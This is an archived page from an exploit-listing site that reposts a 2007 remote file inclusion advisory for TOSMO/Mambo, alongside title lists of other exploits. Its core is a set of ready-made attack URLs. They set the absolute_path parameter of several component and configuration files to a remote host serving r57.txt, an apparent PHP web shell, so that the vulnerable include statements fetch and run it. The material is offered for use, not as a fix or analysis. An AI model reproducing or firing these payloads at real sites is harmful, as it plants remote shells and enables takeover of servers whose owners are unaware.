exploits , vulnerabilities , articles , TOSMO/Mambo 1.4.13a (absolute

2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability
2007-04-12 Mambo Module Weather (absolute_path) RFI Vulnerability
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2007-04-12

TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns

Rated as : High Risk

=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com
securitydot.net - 2007-04-12

Exploits - newest 10 RSS | More

2007-06-15 55522 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32865 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40911 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28524 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19081 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16133 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18750 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16030 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32693 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16652 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns